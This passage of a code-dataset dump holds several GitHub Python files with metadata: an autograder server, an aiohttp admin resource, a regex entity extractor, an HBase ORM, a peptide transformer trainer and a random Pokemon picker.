\"Failed\"\n\n # Test private data\n try:\n logger.info(\"Testing private data\")\n student_result['private_scores'] = autograde(\n student_id, range(1, TASK_NUM + 1),\n private_data_filename,\n private_ans_filename\n )\n except Exception as err:\n logger.info(err, exc_info=True)\n\n # Check flake8\n student_file = os.path.join(DIR_PATH, 'students', student_id + '.py')\n student_result['flake8'] = check_flake8(student_file)\n\n # Add to all results\n results[student_id] = student_result\n return {\n \"results\": results,\n \"task_num\": TASK_NUM,\n \"student_num\": len(student_ids)\n }\n\n\n@app.route('/get_results', methods=['GET'])\ndef get_results():\n return jsonify(results)\n\n\n# Dump results out offline to prevent servertimeout\nresults_dir = os.path.join(DIR_PATH, 'results')\nmake_dirs(results_dir)\nresults_filename = os.path.join(results_dir, 'results.pickle')\nif os.path.exists(results_filename):\n with open(results_filename, 'rb') as fin:\n results = pickle.load(fin)\nelse:\n results = grade()\n with open(results_filename, 'wb') as fout:\n pickle.dump(results, fout)\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "amjltc295/PythonHomework", "sub_path": "src/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 3611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": 
"53", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 41, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 41, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 42, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 42, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 42, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 44, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 44, "usage_type": "name"}, {"api_name": "logging_config.logger.info", "line_number": 46, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 46, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "logging_config.logger.info", "line_number": 70, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 70, "usage_type": "name"}, {"api_name": "autograder.autograde", "line_number": 71, "usage_type": "call"}, {"api_name": "logging_config.logger.info", "line_number": 77, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 77, "usage_type": "name"}, {"api_name": "logging_config.logger.info", "line_number": 82, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 82, "usage_type": "name"}, {"api_name": "autograder.autograde", "line_number": 83, "usage_type": "call"}, {"api_name": "logging_config.logger.info", "line_number": 89, "usage_type": "call"}, {"api_name": "logging_config.logger", "line_number": 89, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "autograder.check_flake8", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 110, "usage_type": "attribute"}, {"api_name": "utils.make_dirs", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 115, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 119, "usage_type": "call"}]}
+{"seq_id": "11110242077", "text": "from abc import abstractmethod, ABCMeta\n\nfrom .security import Permissions, require\nfrom .utils import json_response, validate_query\n\n\nclass AbstractResource(metaclass=ABCMeta):\n\n def __init__(self, *, primary_key, resource_name=None):\n class_name = self.__class__.__name__.lower()\n self._resource_name = resource_name or class_name\n self._primary_key = primary_key\n\n @property\n def primary_key(self):\n return self._primary_key\n\n @abstractmethod\n async def list(self, request): # pragma: no cover\n await require(request, Permissions.view)\n q = validate_query(request.GET)\n assert q\n\n # total number of results should be supplied in separate\n headers = {'X-Total-Count': str(0)}\n return json_response({}, headers=headers)\n\n @abstractmethod\n async def detail(self, request): # pragma: no cover\n await require(request, Permissions.view)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n @abstractmethod\n async def create(self, request): # pragma: no cover\n await require(request, Permissions.add)\n return json_response({})\n\n @abstractmethod\n async def update(self, request): # pragma: no cover\n await require(request, Permissions.edit)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n @abstractmethod\n async def delete(self, request): # pragma: no cover\n await require(request, Permissions.delete)\n entity_id = request.match_info['entity_id']\n assert entity_id\n return json_response({})\n\n def setup(self, app, base_url):\n url = str(base_url / self._resource_name)\n url_id = url + '/{entity_id}'\n add_route = app.router.add_route\n add_route('GET', url, self.list)\n add_route('GET', url_id, self.detail)\n add_route('POST', url, self.create)\n add_route('PUT', url_id, self.update)\n add_route('DELETE', url_id, self.delete)\n", "repo_name": "roscopecoltran/sniperkit-services", "sub_path": "dockerfiles/front-end/admin-interface/aiohttp/admin-elastic/sps/aiohttp_admin/resource.py", "file_name": "resource.py", "file_ext": "py", "file_size_in_byte": 2071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 7, "usage_type": "name"}, {"api_name": "security.require", "line_number": 20, "usage_type": "call"}, {"api_name": "security.Permissions.view", "line_number": 20, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.validate_query", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.json_response", "line_number": 26, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 18, "usage_type": "name"}, {"api_name": "security.require", "line_number": 30, "usage_type": "call"}, {"api_name": "security.Permissions.view", "line_number": 30, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 30, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 33, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 28, "usage_type": "name"}, {"api_name": "security.require", "line_number": 37, "usage_type": "call"}, {"api_name": "security.Permissions.add", "line_number": 37, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 37, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 38, "usage_type": "call"}, {"api_name": "abc.abstractmethod", 
"line_number": 35, "usage_type": "name"}, {"api_name": "security.require", "line_number": 42, "usage_type": "call"}, {"api_name": "security.Permissions.edit", "line_number": 42, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 42, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 45, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 40, "usage_type": "name"}, {"api_name": "security.require", "line_number": 49, "usage_type": "call"}, {"api_name": "security.Permissions.delete", "line_number": 49, "usage_type": "attribute"}, {"api_name": "security.Permissions", "line_number": 49, "usage_type": "name"}, {"api_name": "utils.json_response", "line_number": 52, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 47, "usage_type": "name"}]}
+{"seq_id": "3221604569", "text": "from io import StringIO\nfrom fastapi import Depends\nimport pandas as pd\nimport re\n\nfrom api.crud.crud import create_excerpt_metadata, create_named_entity\nfrom api.model.schemas import ExcerptMetadataCreate, NamedEntityCreate\n\nfrom database.connection import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\ndef find_regex(id:str, text:str) -> list:\n docs=[]\n cnt=0\n\n url_extract_pattern = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n mail_extract_pattern = \"([a-z0-9_.-]+@[a-z0-9_.-]+)\"\n cpf_extract_pattern = \"\\d{3}\\.?\\d{3}\\.?\\d{3}\\-?\\d{2}\"\n cnpj_extract_pattern = \"\\d{2}\\.?\\d{3}\\.?\\d{3}\\/\\d{4}-\\d{2}\"\n\n for url in re.finditer(url_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': url.group(),\n 'start_offset': url.start(),\n 'end_offset': url.start() + len(url.group()),\n 'entity_type':\"URL\"})\n\n for email in re.finditer(mail_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': email.group(),\n 'start_offset': email.start(),\n 'end_offset': email.start() + len(email.group()),\n 'entity_type':\"E-mail\"})\n\n for cpf in re.finditer(cpf_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': cpf.group(),\n 'start_offset': cpf.start(),\n 'end_offset': cpf.start() + len(cpf.group()),\n 'entity_type':\"CPF\"})\n\n for cnpj in re.finditer(cnpj_extract_pattern, str(text)):\n cnt+=1\n\n docs.append({'excerpt_id': id,\n 'content': cnpj.group(),\n 'start_offset': cnpj.start(),\n 'end_offset': cnpj.start() + len(cnpj.group()),\n 'entity_type':\"CNPJ\"})\n\n #if docs != []:\n # print(docs)\n #return docs\n\n return docs if docs else []\n\ndef execute_csv_regex(file):\n\n contents = file.file.read()\n s = str(contents,'utf-8')\n data = StringIO(s)\n df = pd.read_csv(data)\n\n count_excerpt = 0\n count_named_entities = 0\n for index, row in df.iterrows():\n\n result = str(row['excerpt']).replace('- ', '')\n docs = find_regex(row['excerpt_id'], result)\n excerpt_metadata = ExcerptMetadataCreate(excerpt_id=row['excerpt_id'], uf=row['source_state_code'], cidade=row['source_territory_name'], tema=row['excerpt_subthemes'], data=row['source_created_at'])\n db_gen = get_db()\n db = next(db_gen)\n count_excerpt+=1 if (create_excerpt_metadata(db, excerpt_metadata)) else False\n if len(docs) > 0:\n for name in docs:\n item = NamedEntityCreate(excerpt_id=name['excerpt_id'], content=name['content'], start_offset=name['start_offset'], end_offset=name['end_offset'], entity_type=name['entity_type'])\n\n count_named_entities+=1 if (create_named_entity(db, item)) else False\n\n return \"Saved \" + str(count_excerpt) + \" excerpt ids and \" + str(count_named_entities) + \" named entitites\"", "repo_name": "MLRG-CEFET-RJ/qdrec", "sub_path": "scripts/append_regex.py", "file_name": "append_regex.py", "file_ext": "py", "file_size_in_byte": 3322, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "database.connection.SessionLocal", "line_number": 12, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 27, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 36, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 45, "usage_type": 
"call"}, {"api_name": "re.finditer", "line_number": 54, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 74, "usage_type": "call"}, {"api_name": "api.model.schemas.ExcerptMetadataCreate", "line_number": 82, "usage_type": "call"}, {"api_name": "api.crud.crud.create_excerpt_metadata", "line_number": 85, "usage_type": "call"}, {"api_name": "api.model.schemas.NamedEntityCreate", "line_number": 88, "usage_type": "call"}, {"api_name": "api.crud.crud.create_named_entity", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "70418882410", "text": "from .exceptions import EmptyColumnError, BadRowKeyError\nfrom .fields import HBaseField, IntegerField, TimestampField\nfrom django.conf import settings\nfrom django_hbase.client import HBaseClient\n\nclass HBaseModel:\n\n class Meta:\n table_name = None\n row_key = () # None\n\n @classmethod\n def get_table(cls):\n conn = HBaseClient.get_connection()\n return conn.table(cls.get_table_name())\n\n @property\n def row_key(self):\n return self.serialize_row_key(self.__dict__)\n\n @classmethod\n def get_field_hash(cls):\n field_hash = {}\n for field in cls.__dict__:\n field_obj = getattr(cls, field)\n # 可以写成 for field, field_obj in cls.__dict__.items() 吗?\n if isinstance(field_obj, HBaseField):\n field_hash[field] = field_obj\n return field_hash\n\n def __init__(self, **kwargs):\n for key, field in self.get_field_hash().items():\n value = kwargs.get(key)\n setattr(self, key, value)\n\n @classmethod\n def init_from_row(cls, row_key, row_data):\n if not row_data:\n return None\n data = cls.deserialize_row_key(row_key)\n for column_key, column_value in row_data.items():\n # remove column family\n column_key = column_key.decode('utf-8')\n key = column_key[column_key.find(':') + 1:]\n data[key] = cls.deserialize_field(key, column_value)\n return cls(**data)\n\n @classmethod\n def serialize_row_key(cls, data, is_prefix=False):\n \"\"\"\n serialize dict to bytes (not str)\n {key1: val1} => b\"val1\"\n {key1: val1, key2: val2} => b\"val1:val2\"\n {key1: val1, key2: val2, key3: val3} => b\"val1:val2:val3\"\n \"\"\"\n field_hash = cls.get_field_hash()\n values = []\n for key in cls.Meta.row_key:\n field = field_hash.get(key)\n if field.column_family: # 也许这个不用了\n continue\n value = data.get(key)\n if value is None:\n if not is_prefix:\n raise BadRowKeyError(f\"{key} is missing in row key\")\n break\n value = cls.serialize_field(field, value)\n if ':' in value:\n raise BadRowKeyError(f\"{key} should not contain ':' in value: {value}\")\n values.append(value)\n return bytes(':'.join(values), encoding='utf-8')\n\n @classmethod\n def deserialize_row_key(cls, row_key):\n \"\"\"\n \"val1\" => {'key1': val1, 'key2': None, 'key3': None}\n \"val1:val2\" => {'key1': val1, 'key2': val2, 'key3': None}\n \"val1:val2:val3\" => {'key1': val1, 'key2': val2, 'key3': val3}\n \"\"\"\n data = {}\n if isinstance(row_key, bytes):\n row_key = row_key.decode('utf-8')\n\n # val1:val2 => val1:val2: 方便每次 find(':') 都能找到一个 val\n row_key = row_key + ':'\n for key in cls.Meta.row_key:\n index = row_key.find(':')\n if index == -1:\n break\n data[key] = cls.deserialize_field(key, row_key[:index])\n row_key = row_key[index + 1:]\n return data\n\n @classmethod\n def serialize_field(cls, field, value):\n value = str(value)\n if isinstance(field, IntegerField):\n # 因为排序规则是按照字典序排序,那么就可能出现 1 10 2 这样的排序\n # 解决的办法是固定 int 的位数为 16 位(8的倍数更容易利用空间),不足位补 0\n value = str(value)\n while len(value) < 16:\n value = '0' + value\n if field.reverse:\n value = value[::-1]\n return value\n\n @classmethod\n def deserialize_field(cls, key, value):\n field = cls.get_field_hash()[key]\n if field.reverse:\n value = value[::-1]\n if field.field_type in [IntegerField.field_type, TimestampField.field_type]:\n return int(value)\n return value\n\n @classmethod\n def serialize_row_data(cls, data):\n row_data = {}\n field_hash = cls.get_field_hash()\n for key, field in field_hash.items():\n if not field.column_family:\n continue\n column_key = '{}:{}'.format(field.column_family, key)\n column_value = data.get(key)\n if column_value is 
None:\n continue\n row_data[column_key] = cls.serialize_field(field, column_value)\n return row_data\n\n def save(self, batch=None):\n row_data = self.serialize_row_data(self.__dict__)\n if len(row_data) == 0:\n raise EmptyColumnError()\n if batch:\n batch.put(self.row_key, row_data)\n else:\n table = self.get_table()\n table.put(self.row_key, row_data)\n\n @classmethod\n def get(cls, **kwargs):\n row_key = cls.serialize_row_key(kwargs)\n table = cls.get_table()\n row_data = table.row(row_key)\n return cls.init_from_row(row_key, row_data)\n\n @classmethod\n def create(cls, batch=None, **kwargs):\n instance = cls(**kwargs)\n instance.save(batch=batch)\n return instance\n\n @classmethod\n def batch_create(cls, batch_data):\n table = cls.get_table()\n batch = table.batch()\n results = []\n for data in batch_data:\n results.append(cls.create(batch=batch, **data))\n batch.send()\n return results\n\n @classmethod\n def get_table_name(cls):\n if not cls.Meta.table_name:\n raise NotImplementedError('Missing table_name in HBaseModel meta class')\n if settings.TESTING:\n # return 'test_{}'.format(cls.Meta.table_name)\n return f'test_{cls.Meta.table_name}' # 现在流行这么写\n return cls.Meta.table_name\n\n @classmethod\n def drop_table(cls):\n if not settings.TESTING:\n raise Exception('You can not drop table outside of unit tests')\n conn = HBaseClient.get_connection()\n conn.delete_table(cls.get_table_name(), True)\n\n @classmethod\n def create_table(cls):\n if not settings.TESTING:\n raise Exception('You can not create table outside of unit tests')\n conn = HBaseClient.get_connection()\n # convert table name from bytes to str\n tables = [table.decode('utf-8') for table in conn.tables()]\n if cls.get_table_name() in tables:\n return\n column_families = {\n field.column_family: dict()\n for key, field in cls.get_field_hash().items()\n if field.column_family is not None\n }\n conn.create_table(cls.get_table_name(), column_families)\n\n # 实现一个 get_or_create 的方法,返回 (instance, created)\n\n @classmethod\n def serialize_row_key_from_tuple(cls, row_key_tuple):\n if row_key_tuple is None:\n return None\n data = {\n key: value\n for key, value in zip(cls.Meta.row_key, row_key_tuple)\n }\n return cls.serialize_row_key(data, is_prefix=True)\n\n @classmethod\n def filter(cls, start=None, stop=None, prefix=None, limit=None, reverse=False):\n # serialize tuple to str\n row_start = cls.serialize_row_key_from_tuple(start)\n row_stop = cls.serialize_row_key_from_tuple(stop)\n row_prefix = cls.serialize_row_key_from_tuple(prefix)\n\n # scan table\n table = cls.get_table()\n rows = table.scan(row_start, row_stop, row_prefix, limit=limit, reverse=reverse)\n\n # deserialize to instance list\n results = []\n for row_key, row_data in rows:\n instance = cls.init_from_row(row_key, row_data)\n results.append(instance)\n return results\n\n @classmethod\n def delete(cls, **kwargs):\n row_key = cls.serialize_row_key(kwargs)\n table = cls.get_table()\n return table.delete(row_key)", "repo_name": "joyu-ai/django-twitter", "sub_path": "django_hbase/models/hbase_models.py", "file_name": "hbase_models.py", "file_ext": "py", "file_size_in_byte": 7972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 14, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 14, "usage_type": "name"}, {"api_name": "fields.HBaseField", "line_number": 27, "usage_type": "argument"}, 
{"api_name": "exceptions.BadRowKeyError", "line_number": 65, "usage_type": "call"}, {"api_name": "exceptions.BadRowKeyError", "line_number": 69, "usage_type": "call"}, {"api_name": "fields.IntegerField", "line_number": 97, "usage_type": "argument"}, {"api_name": "fields.IntegerField.field_type", "line_number": 112, "usage_type": "attribute"}, {"api_name": "fields.IntegerField", "line_number": 112, "usage_type": "name"}, {"api_name": "fields.TimestampField.field_type", "line_number": 112, "usage_type": "attribute"}, {"api_name": "fields.TimestampField", "line_number": 112, "usage_type": "name"}, {"api_name": "exceptions.EmptyColumnError", "line_number": 133, "usage_type": "call"}, {"api_name": "django.conf.settings.TESTING", "line_number": 167, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 167, "usage_type": "name"}, {"api_name": "django.conf.settings.TESTING", "line_number": 174, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 174, "usage_type": "name"}, {"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 176, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 176, "usage_type": "name"}, {"api_name": "django.conf.settings.TESTING", "line_number": 181, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 181, "usage_type": "name"}, {"api_name": "django_hbase.client.HBaseClient.get_connection", "line_number": 183, "usage_type": "call"}, {"api_name": "django_hbase.client.HBaseClient", "line_number": 183, "usage_type": "name"}]}
+{"seq_id": "12429861819", "text": "from gensim.models import KeyedVectors\nimport pandas as pd\nimport numpy as np\nimport time\nimport tensorflow as tf\nimport Transformer as tfr\n\nnum_shape = 512\n\nion_w2v = KeyedVectors.load_word2vec_format(\"ion_w2v\")\namino_w2v = KeyedVectors.load_word2vec_format(\"amino_w2v\")\ndata = pd.read_csv(\"data.csv\")\nprint(len(data[\"mz\"]))\nprint(len(data[\"seq\"]))\nmz_mx_len = 0\nseq_mx_len = 0\nfor i in data[\"mz\"]:\n mz_array = np.fromstring(i[1:-1], dtype=float, sep=' ')\n mz_mx_len = max(mz_mx_len,len(mz_array))\n\nfor i in data[\"seq\"]:\n seq_mx_len = max(seq_mx_len,len(i))\nseq_mx_len += 2\nzero = []\nfor i in range(num_shape):\n zero.append(0)\ninput_array = []\noutput_array = []\ncnt = 0\ntotal = len(data[\"mz\"])\nload_count = np.zeros((101))\nmx_val = 0\nfor i in data[\"mz\"]:\n mz_array = np.fromstring(i[1:-1], dtype=float, sep=' ')\n vv = []\n for p in mz_array:\n rval = p * 10\n rval = round(rval)\n mx_val = max(mx_val,rval)\n vv.append(rval)\n diff = mz_mx_len - len(mz_array)\n for p in range(diff):\n vv.append(0)\n input_array.append(vv)\n if cnt%50 == 0:\n per = int(round((cnt*100/total)))\n if per%10 == 0 and load_count[per] == 0:\n print(\"{} % process....\".format(round(cnt*100/total),-1))\n load_count[per] = 1\n cnt = cnt + 1\n\nprint(\"Succes input array\")\ntime.sleep(1)\n\nload_count = np.zeros((101))\ncnt = 0\nfor i in data[\"seq\"]:\n vv = []\n vv.append(1)\n for p in i:\n vv.append(ord(p)-ord('A') + 3)\n vv.append(2)\n diff = seq_mx_len - len(i) - 2\n for p in range(diff):\n vv.append(0)\n output_array.append(vv)\n if cnt%50 == 0:\n per = int(round((cnt*100/total)))\n if per %10 == 0 and load_count[per] == 0:\n print(\"{} % process....\".format(round(cnt * 100 / total), -1))\n load_count[per] = 1\n cnt = cnt + 1\n\nprint(\"Success output array\")\n\nprint(\"input size : {} , output size :{}\".format(len(input_array),len(output_array)))\n\nprint(\"go into Transformer\")\ntime.sleep(1)\n\nprint(\"max_value : {}\".format(mx_val))\ndmodel = 512\nnum_layer = 6\nnum_head = 8\ndff = 2048\ndropout = 0.3\ninput_size = 20000\noutput_size = 30\nepoch = 20\nBATCH_SIZE = 20\nBUFFER_SIZE = 20000\ninput_array = np.array(input_array)\noutput_array = np.array(output_array)\n\nATCH_SIZE = 64\nBUFFER_SIZE = 20000\nprint(seq_mx_len)\ndataset = tf.data.Dataset.from_tensor_slices((\n {\n 'inputs': input_array,\n 'dec_inputs': output_array[:, :-1]\n },\n {\n 'outputs': output_array[:, 1:]\n },\n))\n\ndataset = dataset.cache()\ndataset = dataset.shuffle(BUFFER_SIZE)\ndataset = dataset.batch(BATCH_SIZE)\ndataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\ntf.keras.backend.clear_session()\nmodel = tfr.transformer(vocab_size=input_size,\n num_layers=num_layer,\n dff=dff,\n d_model=dmodel,\n num_heads=num_head,\n dropout=dropout)\nlearning_rate = tfr.CustomSchedule(dmodel)\n\noptimizer = tf.keras.optimizers.Adam(\n learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)\n\ndef loss_function(y_true, y_pred):\n y_true = tf.reshape(y_true, shape=(-1, seq_mx_len - 1))\n\n loss = tf.keras.losses.SparseCategoricalCrossentropy(\n from_logits=True, reduction='none')(y_true, y_pred)\n\n mask = tf.cast(tf.not_equal(y_true, 0), tf.float32)\n loss = tf.multiply(loss, mask)\n\n return tf.reduce_mean(loss)\n\ndef accuracy(y_true, y_pred):\n print(y_true)\n y_true = tf.reshape(y_true, shape=(-1, seq_mx_len - 1))\n return tf.keras.metrics.sparse_categorical_accuracy(y_true, y_pred)\n\nmodel.compile(optimizer=optimizer, loss=loss_function, 
metrics=[accuracy])\nmodel.fit(dataset,epochs=epoch)", "repo_name": "dtc03012/Peptide_Search", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 10, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 10, "usage_type": "name"}, {"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 11, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 55, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tensorflow.data", "line_number": 111, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.backend.clear_session", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 113, "usage_type": "attribute"}, {"api_name": "Transformer.transformer", "line_number": 114, "usage_type": "call"}, {"api_name": "Transformer.CustomSchedule", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 128, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 131, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.keras.metrics.sparse_categorical_accuracy", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 139, "usage_type": "attribute"}]}
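The loss_function in the record above shows the standard padding-mask pattern for sequence models: positions whose target is the padding id 0 are zeroed out of the cross-entropy, so the model is never trained to predict filler. A minimal, self-contained sketch of that masking idea, separate from the surrounding Transformer code (the shapes and the normalize-by-mask-count reduction here are illustrative choices, not the record's exact reduce_mean):

import tensorflow as tf

def masked_sparse_ce(y_true, y_pred):
    # Per-position cross-entropy, no reduction yet: shape (batch, seq_len).
    loss = tf.keras.losses.SparseCategoricalCrossentropy(
        from_logits=True, reduction='none')(y_true, y_pred)
    # 1.0 where the target is a real token, 0.0 where it is padding (id 0).
    mask = tf.cast(tf.not_equal(y_true, 0), loss.dtype)
    # Normalize by the number of unmasked positions (the record averages
    # over all positions instead).
    return tf.reduce_sum(loss * mask) / tf.maximum(tf.reduce_sum(mask), 1.0)

# Illustrative shapes: batch of 2, sequence length 4, vocabulary of 10.
y_true = tf.constant([[1, 5, 2, 0], [1, 2, 0, 0]])
y_pred = tf.random.normal((2, 4, 10))
print(masked_sparse_ce(y_true, y_pred).numpy())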
+{"seq_id": "71442091369", "text": "import requests\nimport random\n\n# Define the API endpoint for Pokemon names\napi_endpoint = \"https://pokeapi.co/api/v2/pokemon/?limit=1118\"\n\n# Make a request to the API and get the JSON response\nresponse = requests.get(api_endpoint).json()\n\n# Extract the list of Pokemon names from the response\npokemon_names = [pokemon['name'] for pokemon in response['results']]\n\n# Get a random Pokemon name from the list\nrandom_pokemon = random.choice(pokemon_names)\n\n# Capitalize the first letter of the Pokemon name\ncapitalized_pokemon = random_pokemon.capitalize()\n\n# Print the result\n# print(capitalized_pokemon)\n", "repo_name": "Shields003/pythonNPC", "sub_path": "getPokemon.py", "file_name": "getPokemon.py", "file_ext": "py", "file_size_in_byte": 601, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}]}
